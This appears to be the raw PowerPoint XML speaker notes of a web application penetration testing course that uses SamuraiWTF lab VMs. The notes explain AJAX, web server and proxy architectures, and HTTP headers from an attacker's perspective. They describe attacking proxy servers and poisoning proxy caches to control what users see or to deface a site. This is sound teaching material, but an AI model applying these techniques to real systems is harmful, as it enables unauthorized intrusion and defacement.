              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1139825" lvl="4" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The open method specifies the properties of the request.  It does not actually initiate a connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1139825" lvl="4" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Creates the connection to the referenced URL sending the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>onreadystatechange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1139825" lvl="4" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This property specifies the function that is called when the ready state changes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>readyState</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1139825" lvl="4" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This property is set with the state of the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="682625" lvl="1" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>responseText</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1139825" lvl="4" indent="-109538">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The response from the server is place in this property.</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144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343044"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The readyState property is used quite a bit in AJAX programming.  It allows the scripting code to determine what state a response from the server is in.  The numeric representations are then used by the application code to determine which actions to run.</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145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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7" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344068"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Here is an example of how to use the XMLHttpRequest object.  At the top we initialize the object and declare a search string.  After that we set up the request and build a function to alert with the response content.  The last step on this slide is to build the POST header.</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146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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1" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345092"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On this slide, we call the send method of the object, passing in the XML string that the Google system requires for requests to its API.  The string "GOOGLEKEY" would be replaced with the API key we have.  (If we don't have one, they are no longer available.  We will cover a work around for this tomorrow.)</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147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34611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Now that we have covered JavaScript from the perspective of a penetration tester, let's do some coding!</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148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31437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This page intentionally left blank.</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149</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Typically, there are four different architectures that web sites follow.  Understanding which architecture is in use helps the attacker plan successful attacks, both against the application and the network after gaining a foothold within the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Penetration testers need to figure out the type of architecture in use very early in the test.  During white</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>box tests, the target system personnel would tell the testers.  But during grey or black box testing, the architecture needs to be determined. This is accomplished by examining the clues inserted into the responses from the application. </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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35430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Today we have examined the web from the attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s perspective. We have studied web protocols and applications, and discussed approaches for breaking them. Over the next five days we are going to dig deeper into that mindset.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We have also reviewed the four-step attach methodology, which includes reconnaissance, mapping, discovery and exploitation phases. During the remainder of the class, we will closely examine the four steps of the attack and figure out ways to push the boundaries of web applications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We hope that you will enjoy the process as much as we enjoy sharing it with you.</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150</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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Originally, web servers provided only static content. This is the simplest form of web server. Examples of this category include IIS with the ISAPI plugins disabled, or Apache with the modules disabled.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As you can see, our model of a classic web server's communication is extremely simple. It falls under the client-server model. Beyond that, it is not terribly interesting to us or to attackers. Classic web servers are typically safe from most active attacks, because they do not provide opportunities for input. They are, of course, useful for information discovery.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fortunately, modern web servers fall under the "dynamic" category, and are more interesting!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB"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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Today, most often when the term "web server" is used, the speaker is referring to the "dynamic" category.  This means that in addition to serving static pages, the web server also provides active content. Web servers that proxy requests for application servers fall into this category if they also manage the static content such as graphics or style sheets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is a typical setup for a dynamic  web server. The web server provides content to the web client, while also accessing and/or manipulating back-end data storage. </a:t>
            </a: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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application servers typically sit between a front-end web server (or proxy server) and a data store. The application server processes the application logic and either retrieves data from the data store or sends presentation to the front end servers. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As shown in the diagram above, the web client connects to a web server or reverse proxy server.  This, in turn, connects to an application server that uses data from the data store to perform business actions.  The application server then returns the results to the client through the web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some examples of application servers are IBM WebSphere, BEA WebLogic, JBoss, Lotus Domino.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB"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GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The general term "proxy server" refers to a server which receives client requests and forwards them to another server, and vice versa.  "Web proxies" are specifically designed to handle web traffic. They can be located at the client site, in which case they are often used to restrict and filter web content, or at the server site, in which case they are often used to sanitize user input before it is passed on to an application server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web proxies often cache results in order to speed future requests.  If a caching proxy server is misconfigured, it can allow an attacker to bypass authentication or authorization controls.  This is similar to an issue you may have noticed in Google's search caching, where Google search appliances have the credentials to gather certain sites and then display the cached pages to anyone, even users who are not authorized to view them on the original server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'re targeting an application, one thing to remember is that when you port scan an application behind a proxy server to determine OS and service types, the scan will return mixed results.  An example of this was results from such a scan reporting that Hotmail was running on IIS6 on top of a OpenBSD machines. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You can also attack the proxy server. Since proxy servers sometimes act as front-ends for multiple applications, this can potentially allow you to exploit other applications, as well.  Furthermore, by poisoning the proxy cache, you can control what other users see. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201732" name="Slide Image Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>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receive two DVDs.  (Unless they were shipped with your books)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>  On disk one, there is a README.txt file and a zip that contains the target VM.  Extract this file to a location on your hard drive.  On disk two is the samuraiWTF zip file.  Extract this one to another place on your hard drive.  We recommend that you place both into directories under a PEWAPT101 directory to keep them together.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Run both virtual machines by clicking on their respective .vmx files. If the VM was moved or copied, select “I moved it” when VMware prompts you.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0"/>
              <a:t>Make sure that both VMs are running during every exercise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" baseline="0" dirty="0"/>
              <a:t>Unless instructed otherwise, do ALL exercises in the SamuraiWTF VM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="685748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As an attacker, understanding the server architecture helps us gain more from each attack.  First, we need to clearly define our target. Then, we need to consider the placement of our target in relation to the web server architecture, and develop our goals. The architecture itself will open attack vectors.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, if we are attacking an application to gain more information or access to its data, then knowing that an application server is in place guides our attack. If we are attacking the company behind the application, then sending attacks that cause the proxy server to cache incorrect results, potentially defacing the site, would be one potential goal.</a:t>
            </a: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In this section, we will explore the HTTP protocol and its components.  This is not simply a review, but an exploration of these topics, in which we will examine how an attacker uses the protocol and to further his or her goals.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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xfrm>
            <a:off x="762000" y="4560888"/>
            <a:ext cx="5791200" cy="4319587"/>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pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Let's examine the Hypertext Transfer Protocol (HTTP), which forms the basis for information transfer on the web. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP is a request-response protocol, in which a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>user agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(the client) makes a request to the origin server, which responds. It was originally designed by Tim Berners-Lee at CERN, in order to share documents and files among researchers. Since then, it has been improved, extended and standardized by the World Wide Web Consortium (W3C) and the IETF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP is an unreliable protocol, which means that in order to work effectively, in needs to run on top of a reliable transport protocol such as TCP. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The HTTP/1.1 protocol is defined in RFC 2616:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://tools.ietf.org/html/rfc2616</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You can also read about the original HTTP design considerations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://www.w3.org/Protocols/DesignIssues.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If you are interested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> in the HTTP 2.0 spec, check it out at http://tools.ietf.org/html/draft-ietf-httpbis-http2-04   It is currently being worked on.  One interesting thing that will drastically change our testing is the binary nature being set up.</a:t>
            </a:r>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xfrm>
            <a:off x="762000" y="4560888"/>
            <a:ext cx="5791200" cy="4319587"/>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As shown in the slide above, the web client will send a request for a specific resource.  The GET method is used in the example.  The client will also specify which version of the HTTP protocol that it is using.  The User-Agent and the Host name required are also sent.  Finally, any cookies already set and the content length are specified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As you can see on the slide, the request contains a number of header fields.  Most of these fields are optional and added by the client or the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The request is where the client is requesting the resource.  Later we will discuss the various methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The user agent string is an identifier that the client sets.  The server can use this information to change its logic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Any cookies set by this application are part of each request after they have been established.</a:t>
            </a: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xfrm>
            <a:off x="533400" y="4560888"/>
            <a:ext cx="6324600" cy="4319587"/>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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The web client is referred to in the HTTP RFC as the "user agent." During an HTTP request, the web client sends information about itself in a string with the prefix "User-Agent." This information typically identifies the client browser, host operating system and language (although not in a standardized manner). This allows the web server to respond with pages formatted for the web client's system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Although the user-agent string is typically set correctly by default, it can be modified or spoofed by the end user. This can allow the end user to retrieve content designed for other browser types, provide incorrect browser statistics to a server, or evade internal browser standardization controls. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The various parts of the user-agent string identifies the various pieces of software that make up the browser platform.  Many different things can change this string including spyware or extensions that provide the ability to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Windows NT 5.1 is interesting as it signifies the XP version of Windows.  </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The server then responds with the status code and message.  It will return a content type to tell the client what type of data to expect and a content length.  The server will also send a date header and optionally a header named Server, which may disclose information regarding server type and installed modules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
